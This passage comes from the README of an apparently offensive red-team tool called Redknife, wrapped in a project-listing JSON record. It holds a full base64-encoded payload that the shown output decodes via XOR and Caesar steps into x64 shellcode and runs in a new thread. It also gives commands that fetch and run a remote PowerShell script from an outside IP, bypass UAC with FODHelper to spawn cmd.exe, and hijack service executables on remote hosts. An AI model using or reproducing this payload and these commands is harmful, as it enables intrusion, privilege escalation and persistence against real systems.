Payload:\n================================================================\nZyLnj5qCt2pqYyk5IDo4K1m4MAUi9jgKK/84ezQi9jhKK3vTKSAi9hg6NFmhK1mq1y4J52heQympqH0pYKmIlDgi9jhK9iguIDkiYLoE4BJydmh77BhqY2r/4+JqY2oi7KoWCiJps/8iezom9ipKKGm6jjQiYqE9UKEp9lbiK2m0K1mqIKmhdN4pYKlSgxWZN2c+T2IlWLkVuzIm9ipGKGm6DSn/dyIm9ipOKGm6IP9m6ykyK2m6IDIMODApOykxIDAi7p5KIDhrgzIpODAi9niBNmtrYg0iUI83KKwTCBwBFQUWYyk0K+GJKKOoNxNEamu1Pjci6Ik3OT1Zoz1ZqDc3KNBQPRHDY2pqY2u1i3tqY2pZWFhcUFRSVVZVVVlUWmowK+GpKKOqpmlqYz1ZqDc3CWc3KNAz6MukY2pqY2u1iw5qY2pbORkwURY5EAUEXyU7FildPgkdETMlGgMYCyk5AVYzDwUDFz4gWCccGxI9G1YXDVIlGSYDP1M7OSUGPxo1GzMzLDsmKjNTG1UQGlIAPylZWiJSMlQ4G1hZFQsSYyLhoDcwIDI9UKE3K9JqUcLmY2pqYzo3PiGjoZ81VS9rvCLhrQBgAiLhkABLOTgC41dqYyHhgwBmIDEh2RUkxeRqY2pqYrU9UKo3OSLhkD1ZqD1ZqDc3KKOoVGRy5mu17KoVQiKjoOJ3Y2oh2SaaXIpqY2pqYrUiYrsWYZ/AizVqY2o3OAAqOSHhsKmIcyGjo2p6Y2oh2TLGPoVqY2pqYrUi/jc3K+GDK+GZK+GwKKOqY0pqYyHhmCHQcfThgWpqY2prvCLnr0rloxbYDf9jK2mn7KoVsTKnOwBqOK+KREBgIOGwYrU=\n\n================================================================\nBUFFER:\n5a 79 4c 6e 6a 35 71 43 74 32 70 71 59 79 6b 35\n49 44 6f 34 4b 31 6d 34 4d 41 55 69 39 6a 67 4b\n4b 2f 38 34 65 7a 51 69 39 6a 68 4b 4b 33 76 54\n...\n4b 32 6d 6e 37 4b 6f 56 73 54 4b 6e 4f 77 42 71\n4f 4b 2b 4b 52 45 42 67 49 4f 47 77 59 72 55 3d\n0a\nBUFFER:\n67 22 e7 8f 9a 82 b7 6a 6a 63 29 39 20 3a 38 2b\n59 b8 30 05 22 f6 38 0a 2b ff 38 7b 34 22 f6 38\n4a 2b 7b d3 29 20 22 f6 18 3a 34 59 a1 2b 59 aa\n...\n2b 69 a7 ec aa 15 b1 32 a7 3b 00 6a 38 af 8a 44\n40 60 20 e1 b0 62 b5\n[\u003e] Transforming buffer - XOR with key: foo\nBUFFER:\n01 4d 88 e9 f5 ed d1 05 05 05 46 56 46 55 57 4d\n36 d7 56 6a 4d 90 57 65 4d 90 57 1d 5b 4d 90 57\n...\n05 05 05 04 da 4d 88 c9 25 8a c5 79 b7 6b 90 0c\n4d 06 c8 8a c5 7a d7 5d c8 5d 6f 05 5e c0 e5 22\n2f 0f 46 8e df 04 da\n[\u003e] Transforming buffer - Caesar with key: -5\nBUFFER:\nfc 48 83 e4 f0 e8 cc 00 00 00 41 51 41 50 52 48\n31 d2 51 65 48 8b 52 60 48 8b 52 18 56 48 8b 52\n...\n48 01 c3 85 c0 75 d2 58 c3 58 6a 00 59 bb e0 1d\n2a 0a 41 89 da ff d5\n[\u003e] Spawning new thread for payload\n[-]   Allocating memory for payload, size: 647 bytes\n[-]   Copying payload to allocated memory\n[-]   Creating new thread to execute payload\n[\u003e] Waiting for thread execution\n```\n\n### Using Redknife to run Redknife-ad-enumerate PowerShell script\n\n```\n--debug --module exec-ps --url \"http://192.168.45.227:9000/Tools/Redknife-enum.ps1\"\n```\n\n### FODHelper UAC bypass\n\n```\nRedknife.exe --escalate FODHelper --module shell-cmd --payload \"cmd.exe\" --debug\n```\n\n### Hijacking a Service Executable\n\nRedknife can be used to change a service executable, either on localhost or a remote machine.\n\n```\nC:\\Tools\u003e Redknife.exe --debug --module hijack-remote-service --service-name SERVICENAME --host-name HOSTNAME --payload PAYLOAD\n```\n\nPayload should contain the path to the executable to replace the service binary with. Payload can also contain all the parameters/cmd line args to be passed to the service executable.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fka7ana%2Fredknife","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fka7ana%2Fredknife","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fka7ana%2Fredknife/lists"}